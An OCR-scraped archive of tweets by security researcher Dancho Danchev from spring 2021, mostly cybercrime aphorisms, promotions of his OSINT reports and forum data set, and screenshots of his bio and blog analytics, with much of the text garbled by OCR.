always lose what you don’t respect. #security #cybercrime #malware 


10:35 
Don’t you get it? I’m the whole idea. #security #cybercrime #malware 


10:36 
I’ve lived to see it - a washing machine technician schooling the cybercrime expert. It 
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will be the other way around the next time. #security #cybercrime #malware 


10:36 
Everyone wants a piece of me these days. #security #cybercrime #malware 


10:37 
Is it just me, or I’m most productive when I’m most pissed off? #security 
#cybercrime #malware 
10:37 


There’s a special kind of people who patiently wait for research to accumulate, than 
take credit for acting upon it, excluding the original sources. Sad. #security 
#cybercrime #malware 


10:37 
Self-serving pseudo-anonymous quote of the day: "Just because I’m beautiful, 
doesn’t necessarily mean that I’m stupid too." #security #cybercrime #malware 


real 


10:39 


If you believe that you need to become a cybercriminal in order to catch a 
cybercriminal, you’re an OSINT/CYBERINT amateur. #security #cybercrime #malware 


21 
10:39 
Treating the decease (malware infection) is far more profitable than curing it (jail, 
securing the masses etc.). #security #cybercrime #malware 
10:40 


The day you’re able to gather all this without interacting with the person in question, 
is the day when you can officially call yourself a pro. #security #cybercrime 
#malware 


10:40 

Since everyone knows how to contact "them", why hasn’t anyone done such type of 
interview? Bad taste. #security #cybercrime #malware 

10:42 


What happens when a security researcher starts suffering from the Stockholm 
syndrome, by have a favorable stance against cybercrime? Check out the related 
posts here - https://t.co/q2ZS4|lscnW #security #cybercrime #malware 


21 
10:43 
I’m so proud of my coverage on Chinese censorship since 2006 - I’m reading, and I’m 


smiling. Check out the posts here - https://t.co/cQYnTrQ0Eq #security #cybercrime 
#malware 
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eal 


10:44 


The only way to work with someone you don’t like is by realizing the seriousness of 
the job you’re doing. #security #cybercrime #malware 


10:44 
You shall obfuscate, | shall deobfuscate. #security #cybercrime #malware 


10:45 


But every decent researcher knows that nobody is "building" botnets anymore. 
They’re "generating" them. #security #cybercrime #malware 


10:46 


| Know who you got paid to DDoS last summer. Check out the post here - 
https://t.co/UArb40KSyo #security #cybercrime #malware 


10:46 


Connecting a DDoS for hire service with a government-sponsored attack is like 
connecting a hooker with...well you get the point. #security #cybercrime #malware 


10:47 
No cybercriminal starts from scratch in 2021. It takes a modest $500 investment to 
purchase 1k infected host. #security #cybercrime #malware 
21 
10:49 
The drug addict - the single more irrelevant cosmic phenomena known to the vast 
universe. #offtopic #security #cybercrime #malware 
21 
10:50 
The true OSINT analyst would expose everything without interacting with the people 
in question. #security #cybercrime #malware 
2 
10:51 


Define hypocrisy? Don’t disrupt the cybercrime infrastructure which | originally 
profiled based on my initial research. #security #cybercrime #malware 


10:52 


The reason why | don’t engage in OS security flame wars is simple - there are no 
insecure OSs, they are insecurely configured OSs. #security #cybercrime #malware 


10:52 
Thought of the day: The more they hate you, the more important you are. Then 
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again, life is not a fashion show. So keep walking. #security #cybercrime #malware 


10:53 
There’s no such thing as bad publicity, except your own obituary. #security 
#cybercrime #malware 
10:53 
Feed the masses, eat with the classes #WTF 


10:54 


This is a "with all due respect tweet". Researchers ruining important threat intell 
sources for the sake of their page views are bad researchers. #security #cybercrime 
#malware 


10:54 


Brand it, rebrand it, or co-brand it, the advanced persistent threat is cybercrime as 
usual, with no significant impact on your daily operations. #security #cybercrime 
#malware 


reall 
10:55 
Having worked/studied with RU and CN folks, for RU | know they don’t like being told 


what do to. For CN they either like you or they don’t. #offtopic #security 
#cybercrime #malware 


10:55 


Everyone’s writing books about cyber warfare these days. That’s the problem. 
#security #cybercrime #malware 


10 - Wednesday 


03:38 


New Post - "Exposing the Modern Money Mule Recruitment Ecosystem - An In-Depth 
OSINT Analysis" https://t.co/LOotM4Gcup #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintel #ThreatHunting #Threatintelligence 


26 *3 
22:42 
Folks! Check this out! Cybercrime Forum Data Set for 2019 - https://t.co/TvkrzdPYPT 


#security #cybercrime #malware #CyberSecurity #cyberattacks #CyberSec 
#CyberSecurityAwareness #Threatintel #Threatintelligence Enjoy! 


11 - Thursday 


06:18 
https://t.co/eVsxfo6tWx https://t.co/IFengcU8KA 


Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


https://t.co/JXE067UcqwW https://t.co/9GLQqRXbLC 


06:19 
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06:19 


“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


https://t.co/Xolw3nvMaqyY https://t.co/M4wnJAILUj 


Dancho Danchev's 
Offensive Cyber 
Warfare Articles 
Compilation for 

Unit-123.org 


BY DANCHO DANCHEV 


06:20 
https://t.co/k5QSE62Vkc https://t.co/8yF5IOUIOg 


06:22 


r 
Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/FfRbK11tuUD https://t.co/F4ShD2Rxny 
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06:23 
https://t.co/p6siiRueVF https://t.co/kTRgOv8z0g 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free. ’ 
Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica ania: Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This 1§ 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


aa t-- 


Commercial Copy Available! Approach me toda 
proach your manager today! Empower your Threat 
intelligence Team! An USINT Conducted Today is a 
Tax Payers Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


12 - Friday 
09:09 

https://t.co/kyl5GvScSi 
22 - Monday 


02:17 


Folks. Check this out! New layout at https://t.co/fnswrm8KWP Cheers! Dancho 
#Security #cybercrime #malware #CyberSecurity #CyberAttack #Threatintel 
#Threatintelligence 
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09:23 


I’m switching my personal blog to private mode as of today with the idea to attract a 
new form of readership that also includes loyal readers. Request access now. 
https://t.co/7SCvOYKFHE #security #cybercrime #malware #cyberattacks 
#ThreatHunting #Threatintel #Threatintelligence 


<2 
23:17 


Who’s interested in this? - https://t.co/7SCVOYKFHE #security #cybercrime #malware 
#CyberSec #ThreatHunting 


23:24 


Folks! Who wants to obtain private access to my blog? - https://t.co/7SCVOYKFHE 
#security #cybercrime #malware #CyberSec #ThreatHunting 
https://t.co/sM2UAYVaez 


21 *3 


Competitors 


® Identified Competitors iDefense Labs (US) 
* Cyber Defense Agency (CDA) JET Intelligent Risk Systems (US) 
(US) Informatica (US) 


Cyber Security Research and IT — Information Sharing and 
Development Center (US) Analysis Center (US) 


Cyveillance (US) iSIGHT Partners (US) 

Dancho Danchev (EU) Lookingglass (US) 

Department of Homeland Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 

Ernst & Young (EU) nCircle (US) 

EWA Information and SecureWorks (US) 
Infrastructure Technologies, Inc. Trend Micro (US) 

(US) United States Cyber 

Fortify (US) Consequence Unit (US) 

Global Security Mag (EU) 


23 - Tuesday 


20:47 


96 seats left! Request access today! - https://t.co/wEK5XX2J9Z #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 
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#Threatintelligence 


21 


22:17 


@jmxjmxpro Send an introduction to dancho.danchev@hush.com and I'll then fill you 
in the process. Regards. Dancho 


*1 


24 - Wednesday 


00:38 


93 seats left! Request access today! - https://t.co/JTcqOaYgET 
https://t.co/AKWHqVtDzD 


26 - Friday 


12:18 


Stay tuned for an upcoming interview with me for Russian OSINT. Check out the 
details here - https://t.co/6yL4PKVOsT https://t.co/CrNRo3tvfE 


21 *%2 
tit 


&> Russian OSINT 4 


Streams of Information Security 
Knowledge 


B nnavHax CAenaTb TeKCTOBOe MHTepBbiO C 
OSINT skcneptom Dancho Danchev ana 
KaHana Russian OSINT Ha Temy 
“cybercrime forums 2021 and darknet 
activity: exposing cybercriminals”. 
AKTYanbHo ANA Tex, KTO BNafeer 
AHINMACKMM ASbIKOM, XOYeT 3apaboTaTb M 
nonpo6oBaTb CBOu CHNbI B PopMaTe 
TEKCTOBbIX MHTEPBbIO. 


B KayecTse TecTa BaM HEO6xOQuMo 
HanucaTb 10 UHTepecHbIX BONpocoB 
akcnepty (No BaweMy MHeHMI0) Ha 
@HPNMACKOM ASbIKe M NPuCNaTb ux GoTy 
@russian_osint_bot 8 cnegyrowem 
cbopmare: 


1. Who is Mr. Danchev? 


2. How to expose cybercriminals? 
3. What is OSINT? 


ee ee 


<> VIEW IN CHANNEL 


27 - Saturday 


00:02 


93 seats still left! https://t.co/JTcqOaYgET request access today! 
https://t.co/7g6vWgWzjxX 


*1 
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09:07 


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/FfRbK11tuUD for free including the second edition of the report from here - 
https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/T6b7qJh4QU 


SaMiR, MoHSenSUnBOY, | | ‘Karaj ka, || Team, DevilZ, TM, 
eenlovensay ee ciee Rooter Security, Alipc, 
IRaNHaCK | Infohooman 


Amob07, 
Cyber, Number14, 


DangerMan Dr.Pantagon, PUNISHER, Kazi_root, 


NobOdy, H3X73L, Original-Hackers 
MuteMove Solt6n 4 Tir3x 


Team, 
Msu360, oe Cca, D3stroyer, 
BrainBoy, ret, _inJenious, 
OptiShock GHOST Sianor, Wonted 


BOY, ErRor, 
H3LL, 
MoHalMaD, R3d, 
Shadow.hacker, 


Anti, A | cogs a 
; st3r_4w4r3, 
ibe SHIA T3rr0r 


09:07 


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/FfRbK11tuUD for free including the second edition of the report from here - 
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https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/IgOEabVqra 


ww) 


Circles 


09:07 


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/fRbK11tuUD for free including the second edition of the report from here - 
https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/R3vJ4VkC4u 
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Other Topics (71) 
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Hacked By IRaNHaCK Se... (2) 
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28 - Sunday 


08:49 


Is anyone running a MISP or OpenCTI instance for their team or organization and 
wants me to jump in? Reply or drop me a line dancho.danchev@hush.com #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 


1 
09:01 
In a previous life | was about to work with HBGary - https://t.co/SRSIBRVJOh quite a 
privilege and an honor! Regards. Dancho 


21 %1 


30 - Tuesday 


07:47 


New Post - "Exposing a Currently Active Stolen Credit Cards E-Shop - An OSINT 
Analysis" - https://t.co/wUrRDmhPsS #security #cybercrime #malware 
#CyberSecurity #cyberattacks #Threatintel #threatintelligence 
07:48 


New Post - "Current and Future Assessment of U.S U.K and German Cyber Intelligence 
and Cyber Surveillance Programs and Tradecraft - An Analysis" - 
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https://t.co/n8xwn7cuRQ #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel 


07:48 


New Post - "The "Russia Small Group" - A Step in the Right Direction or a Dangerous 
Game to Play With?" - https://t.co/KgT630ek5c #security #cybercrime #malware 
#CyberSecurity #cyberattacks #Threatintel #threatintelligence 


2 
April 
2 - Friday 
06:28 
Q: Who are you? A: I’m the one schooling you son. https://t.co/TCcFUbDAWUf 
#NowPlaying 
06:31 


https://t.co/EoqHZoaY55 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberCrimes #CyberHunter #ThreatIntelligence #ThreatHunting 


06:32 

https://t.co/qBbOI3zR5f #security #cybercrime #malware 
*1 
06:33 

https://t.co/c9XGjM3iaO #security #cybercrime #malware 
06:34 


https://t.co/kKDPYiIEKDQQ #security #cybercrime #malware 


7 - Wednesday 


09:18 
https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberAttack 
#Threatintelligence #ThreatHunting 
09:52 


@vxunderground @threatresearch Check this out! - https://t.co/1lbf58DQ1sD Cheers! 
Dancho 


*1 
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9 - Friday 


03:35 


Hey @Russian_OSINT just send back the interview questions and I'll be in a stay 
tuned mode to see them published. Regards. Dancho 


22 *%1 
03:41 
Someone's been reading my "Malware - Future Trends" report circa 2006 - 
https://t.co/8wfdqxgEcxX hence today’s modern ransomware threat also known the 


rise of cryptoviral extortion. #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattack 


23 
09:06 


Anyone hiring security bloggers reporters journalists including OSINT analysts and 
threat intelligence analysts? 


17:30 


Guys. Does anyone have an iOS developer account including a Google Developer 
account and wants to assist me in publishing an application for my personal blog? 
Can you send me an invite? Post a comment or send the actual invitation to 
dancho.danchev@hush.com https://t.co/FOHWNnIhiA 
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10 - Saturday 


07:31 


Any iOS developers or Google developers reading this? Can you please post a 
comment. Regards. Dancho 


*1 
09:22 
My presentations - https://t.co/nNsXMPrGi0 


09:24 


Check this out! This is basically a copy of all of my publicly accessible research - 
https://t.co/UZ6qVANXVF 
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09:31 


This is an interview with me - https://t.co/glQoxvUWSs #security #cybercrime 
#malware #CyberSecurity #CyberAttack #ThreatHunting #threatintelligence 


09:48 
Who wants to pre-order? - https://t.co/OleO1lpf7rU https://t.co/cjj9NYhzQt 


O ah 


vo. DANCHEV 
SUCK MY DICK 


09:53 


Underground chatter on my disappearance circa 2010. Source: 
https://t.co/tILTP2B5ZT https://t.co/CQm7Uf27ZC 
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Dancho Danchev sucked it and he will eventually suck it too. 
I’m not doing this as my hobby. 

you think I’m afraid of anything? I have no time to be afraid. 
I’m working. 


09:54 
Underground chatter on my disappearance circa 2010. Source: 
https://t.co/cTtpAbqDQF CC: @XylitOl 
23:37 
The is me in NYTimes on the Koobface botnet - https://t.co/uW1OBMgsXM 


12 - Monday 


02:30 


Amazon Kindle users! Check this out - https://t.co/JT676NfPZI #security #cybercrime 
#malware #CyberAttack #Threatintel #threatintelligence 


el 


23:55 
https://t.co/fRobK11tuUD https://t.co/zfoOWB7TFI 
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23:56 
https://t.co/p6siiRueVF https://t.co/UD5eQ3XMWq 
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Dancho Danchev Presents! Brace Yourselves! 


Grab today a free copy of the Second Free Eg ' 
"Exposing Iran's Hacking Scene OSINT-E d and 


Technical Collection Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 
Organization including Individual Researcher Use - This 1§ 
the Most Comprehensive and Technicall Sophisticated 
Analysis of Iran's Hacking Scene Up-to-Date! 


aa t-- 


Commercial Copy Available! A proach me toda} 
Approach your manager today! Empower your Threat 
intelligence Team! An OSINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


13 - Tuesday 


04:53 
https://t.co/F80Ov6zz0k https://t.co/EHg70dn9ZT 
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14 - Wednesday 


04:36 


Russian OSINT 4 


VnTepsbto c OSINT cneyuwannctom flaHyo 
Jianyesbiom. He Ha Bce BONpPOCbI yAaNnocb 
NONYYUTb pasBepHyTble OTBETbI, HO B 
UeNOM NocbiIN NOHATeH. Ku6epKpaim 
nporpeccupyer, ransomware rnaBHblit 
TpeHA 2021 roa, a CWA no-npexHemy 
HaXOAMTCA B KOHTpax C Poccuel. 
CofepkaHve MHTepBbtO: 


= Kto Taxon Jano? 

= Yem OH 3HAMEHMT? 

=> Pa6ota Ha U.S Law Enforcement u U.S 
Intelligence Community 

> OSINT onepayna "Uncle George” 

= Cybercrime Forum Data Set Ha 16 [6 
> Ransomware wu Darkweb 

> Mpn6binb REvil 

= "PoccuA OCTaeTCA fnaBHbiM 
paccaguuKom KH6epnpectynHocTH” 

=> Ku6epnpectynxocTb B CHI 


https://telegra.ph/Intervyu-s-hakerom- 
Dancho-Danchev-04-12 


Telegraph 

Untepepio c Gonrapckum xakepom 
Aanvo Jlanvespim cneynanbHo 
ana Russian OSINT: Ku6epxpaim B 
2021 

Vima: flaw4o flanyes / Dancho Danchev Pog 
3aHATHA: MB uccnegoBarTenb, OSINT 
cneynanncr Cneynanusayna: Ku6epKpaim, 
Darknet && OSINT Crpana: Bonrapua Caf 
ddanchev.blogspot.com Twitter: 
https://twitter.com/dancho_danchev Russian 
OSINT;: flanyo, pacckaxv HEMHOrO, 
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VIEW IN CHANNEL 


Folks. | wanted to let everyone know that I’ve just released my "Cybercrime Forum 
Data Set for 2021" which consists of full offline copies of over 111 publicly accessible 


cybercrime-friendly forum communities. https://t.co/it8HZFXHh] 


https://t.co/MhaSxxpilk 
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19GB 


Cybercrime Forum 
Data Set 2021 


16 - Friday 


09:59 


Folks! Check out this report courtesy of me - "How to use @whoisxmlapi API in 
Combination with Maltego for Advanced Bulletproof Malicious Infrastructure 
Investigation" - https://t.co/MuQ3QmOnZA [PDF] #security #cybercrime #malware 
#Threatintel #ThreatHunting 


21 %*1 
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17 - Saturday 


07:28 


Folks. Check out my second report for @whoisxmlapi "How to use WhoisXML API in 
Combination with Maltego for Advanced Mapping and Reconnaissance of Botnet 
Command and Control Infrastructure Using Hostinger’s Legitimate Infrastructure" - 
https://t.co/CgxOCjkmdz 


*1 


19 - Monday 


10:18 


I’m live! Show your reader support in case you know who | am what I’m up to and the 
type of research that | publish. https://t.co/uvAt5h1Kt8 iOS version coming soon! 
https://t.co/alF8gw7rBK 
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20 - Tuesday 
02:48 


2:14 Oooh @ - moh 40 
€ Google Play Q 
Blog 
Dancho Danchev 
3) 


Install 


About this app > 


Dancho Danchev is the world’s leading expert in the field 


of cybercrime fighting 


Ratings and reviews 


No reviews yet 


Developer contact so 


OQ’ Gooale Plav refund noliev 


Folks. Stay tuned for an additional set of new white papers using @whoisxmlapi and 
@MaltegoHQ to be released today or tomorrow. Catch up - E-shop for stolen credit 
cards - https://t.co/ChQTqSNqow botnet C&amp;C using @Hostinger - 


21 - Wednesday 


02:40 


https://t.co/eL8FCTB6TW 


Joining Team @whoisxmlapi - https://t.co/SZOM2wMAt) #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
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#ThreatHunting #Threatintelligence 


23 %2 
02:43 


Why I’ve decided to join Team @whoisxmlapi and why you should grab an account 
today? - https://t.co/oDRBOSHOc9 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatIntel #ThreatHunting #Threatintelligence 


=—3 *l 
03:32 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreatintelligence #Threatintel #ThreatHunting 
#Threatintelligence 


23 - Friday 


13:35 


Check this out! https://t.co/KxAShMz7ud CC: @whoisxmlapi @briankrebs #security 
#cybercrime #CyberSecurity #cyberattacks #CybersecurityNews #CyberSec 
#threatintelligence #threatdetection 


real 


13:38 


Folks. Check this out. Second case study for today. https://t.co/bt2QioKYYr CC: 
@whoisxmlapi #Security #cybercrime #malware #CyberSecurity #cyberattacks 
#CybersecurityNews #CyberSec #threatintelligence #threatdetection 


e222 
13:41 


This is the third case study for today. https://t.co/RCa8TBWzMg CC: @whoisxmlapi 
#security #cybercrime #malware #CyberSecurity #cyberattacks 
#CybersecurityNews #CyberSec #threatintelligence #threatdetection 


24 - Saturday 


20:44 


https://t.co/UvVAt5gK9BA‘#security #cybercrime #malware #cybersecuritytips 
#CyberAttack #ThreatHunting https://t.co/Bsuj 7b0sSNW 


21 %1 
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Main navigation 


Medium 


& Search Engine 
=) Notification center 
G) About 


20:45 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #ThreatHunting https://t.co/WMLoSOfQ1z 


21 *1 
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INTRODUCING BOX.SK’S - “HOW TO 
GET IN TOUCH WITH THE KGB — THE 
DEFINITE HACKER’S MANUAL’ ONLINE 
MANUAL 


admin 3 months ago 


10 Years Later — An Exc 


Dancho 
Danchev's 


25 - Sunday 


03:13 


Happy #Emotet Uninstall Day? Since when does law enforcement taking offline 
“everyone’s favorite" botnet constitute the right action? | think that the right 
approach would be to coordinate the take-down of the C&amp;Cs using their Abuse 
department. 


*1 
03:19 


Here’s an enriched OSINT list of all the publicly known and accessible #Emotet 
C&amp;C servers and IPs - https://t.co/9cfq9oruSc including the following case study - 
https://t.co/IZzmqzja94 which | did for @whoisxmlapi using @MaltegoHQ Stay tuned! 
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03:23 


| produced the following #Emotet C&amp;C graphs and distribution maps using my 

information. Check out the actual post here - https://t.co/9cfq9oruSc including the 

actual case study - https://t.co/IZzmqzjJa94 which | did for @whoisxmlapi by using 
@MaltegoHQ https://t.co/dPh62SoRQe 


2 


Host distribution by country 


~ United Kingdom 


04:50 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberSecurity 
https://t.co/pjknL7ElsS 


04:51 


Main navigation 


3) Notification center 
G) About 


https://t.co/uvAt5gK9BA https://t.co/AWjxODfd3T 
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Main navigation 


® Search Engine 
=| Wall 

is) Notification center 
G@) About 


04:52 
https://t.co/uvAt5gK9BA https://t.co/uCxdU7L9Tm 
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07:23 &@ + & 


VIDEOS 


Exposing Koobface - The World's Largest 


Botnet 


09:20 
My sincere condolences to everyone who knew @dakami as a person. | never really 


met him until 2011 when | had big legal troubles in my homeland Bulgaria and got a 
message from him inviting me to crash in his place in the U.S. Thanks! 


*1 
09:43 
https://t.co/CTXOoRYV1n 


09:43 
https://t.co/qugnqoixXg) 
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27 - Tuesday 


00:37 


New Post - "Exposing the Pay Per Install Underground Business Model - Historical 
OSINT - An Analysis - 2008 - Part Two" - https://t.co/IkKD2EovvLO #security 
#cybercrime #malware #CyberSecurity #ThreatHunting 


4 *%2 
01:19 


@nigroeneveld @envirosec This is not serious. Personally the Dutch Law 
Enforcement had been extremely active throughout the past couple of years in terms 
of active measures against cybercrime forum communities and the actual bad guys 
behind them. Cheers for that! 


*1 
01:21 


@nigroeneveld @envirosec Here’s a related post https://t.co/pljQJJc9Pc including this 
https://t.co/voila4FF4W central repositories of information and government including 
private and academic sector work and information sharing should do the work. 


*1 
01:30 


@nigroeneveld @envirosec I’ve been following Dutch LE fighting cybercrime for a 

while. | think that trusted and well-known researchers and organizations should be 

considered an asset to every LE agency. Most importantly a single LE case is often 
solved simply by asking. 


*%2 
01:43 


@nigroeneveld @envirosec Good point. | think that sharing as much threat 
intelligence as possible including with the right parties where necessary is the best 
possible way to attempt to undermine and disrupt the global cybercrime ecosystem. 


*1 
01:44 


@nigroeneveld @envirosec It’s been years since I’ve last quoted this but I’ve once 
Said in case a cybercriminal decides to sue you for tracking down and monitoring 
their fraudulent and malicious campaign they will inevitably signal that they own the 
actual infrastructure. 


*1 
02:12 


My first research paper for @whoisxmlapi is now live. It’s a bulletproof hosting 
infrastructure used by the bad guys with a currently active E-Shop for stolen credit 
cards on the top of it. https://t.co/fesvmCAPHG https://t.co/f9c11UHGKd 
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*%2 


08:04 


Great stuff! My first podcast recording with @whoisxmlapi - https://t.co/c78SWm2HXv 
#security #cybercrime #malware #CyberSecurity 


22 


08:44 
https://t.co/2hfqnBoPEu 


28 - Wednesday 


08:37 
https://t.co/it8HZFXHhJ https://t.co/OgXk3Rlo2h 
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FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


09:17 


https://t.co/QHRkZJK804 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintel https://t.co/e4OLWxkOw4 
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le 
eo Apr 21 = Apr 27 < > 


@ Realtime 


Number of Users 


1 


Audience overview 


Users Sessions New Users 
390 493 358 
7 33.11% t 38.87% t 34.59% 


Trend of Users 


390 +97 ( 7 33.11%) 


= Current Period -- Previous Period 


Behavior overview 


Avg. Session Duration Bounce Rate Pageviews 


09:32 


https://t.co/EVf60SkxOH #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #ThreatIntel https://t.co/kXmaSbeXLf 
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22:14 


22:16 


22:18 


22:20 
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20:19 82h - eof 4a 


= Try “Users last week 9) 


Apr 21 = Apr 27 
f" Pp Pp 


@ Realtime 


Number of Users 


4 


Audience overview 


Users Sessions New Users 
1.53K  1.66K 1.48K 
+ 8.09% +7.27% + 8.46% 


—_—— 
Trend of Users 


1,534 -135 ( 4 8.09%) 


Apr 21 23 2 
= Current Period -- Previous Period 


Behavior overview 


Avg. Session Duration Bounce Rate Pageviews 


https://t.co/UjlI5RqvPgc 


https://t.co/chzJHRMvvM 


https://t.co/brzvDjpOFW 


https://t.co/udATJ6CG8o0 


29 - Thursday 


00:23 


Since when does disinformation and foreign influence campaigns falling into a MITRE 
ATT&amp;CK attack category constitute a threat? - https://t.co/VisfZAmxs] Since now. 


2 *2 
00:24 


With more @FireEye reports on disinformation and foreign influence operations 
making their way into major headlines the rush must be tempered with wisdom 
otherwise we risk falling victim into rogue cyber warfare tensions engineering. 


00:33 


Such type of reports should be considered dangerous in the context of possible cyber 
warfare tensions engineering on behalf of the author. Here are some related articles - 
https://t.co/YosufyCV21 ; https://t.co/4IEIUNda6o - https://t.co/KgT630ek5c 


02:43 


https://t.co/qs5iTxLwmkK1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #Threatintel 


03:44 


| have a new BIO on LinkedIn. Keep reading. Rocking your world already? Just kidding. 
https://t.co/KO8m5LOZZm 


1429 8 & © - Moi sag 
€- _—_Q Dancho Danchev Pe 


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- [had an average of 7,000 RSS readers on my blog 

- [have my own vinyl “Blue Sabbath Black Cheer / Griefer - 
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- | gave an interview to DW on the Koobface Botnet 

- | gave an interview to NYTimes on the Koobface botnet 

- I gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 


03:49 


This is me winning @SCMagazine Who to Follow on Twitter Award for 2011. 
https://t.co/400ck9m8cD 


*1 
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14:29 & & . ae a | 


February 15, 2011 


SC Social Media 
Awards 


Best Security Blogger: Graham Cluley, senior 
technology consultant at Sophos, for the Naked 


Security Blog 


Best Corporate Security Blog: Trend Micro’s 
TrendLabs Malware Blog 


Five to Follow on Twitter: 


¢ @cyberwar and @stiennon (Richard Stennon, 


chief research analyst of IT-Harvest) 


¢ @George KurtzCTO (George Kurtz, worldwide 
CTO of McAfee) 

e @danchodanchev (Dancho Danchev, 
independent security consultant) 

¢ @jeremiahg leremiah Grossman, founder 
and CTO of WhiteHat Security) 

© @owasp (the Open Web Application Security 
Project) 


NEXT POST IN EVENTS 


RSA Conference 2011: Terrorist organizations pose great« 
cyberthreat 


07:07 


My response to #Ransomware - 3,000+ ransomware emails used by gangs and lone 
users taken offline. Beer is on you. https://t.co/U7nD29mcOz 
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18:54 & & @ + Meo “40 


€ Tweet 


Dancho Danchev @dancho 11 Nov 20 

9) New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLQ5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


~~ a P = i 
i? 3 LL VY 7 Xo 


ProtonMail @ 
@ProtonMail 


Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have 

zero tolerance for abuse and 

we'll investigate this and take the 
appropriate actions. 

17:52 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


o) 2 ~, oe 


Tweet your reply (9) 


08:45 


New Post - Exposing China’s "Thousand Talents Program" - An OSINT Analysis - 
https://t.co/WvpFvvOzGN 
09:26 
https://t.co/oNheLlagjV #security #cybercrime #malware #CyberSecurity 


#CyberAttack #cybersecuritytips #Threatintelligence #ThreatHunting #Threatintel 
https://t.co/iot9Vrmc6G 
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<parent> Darkmoney iHonker ShadowMarket 
T1Wang DarkWeb LinkFeed SkyFraud 
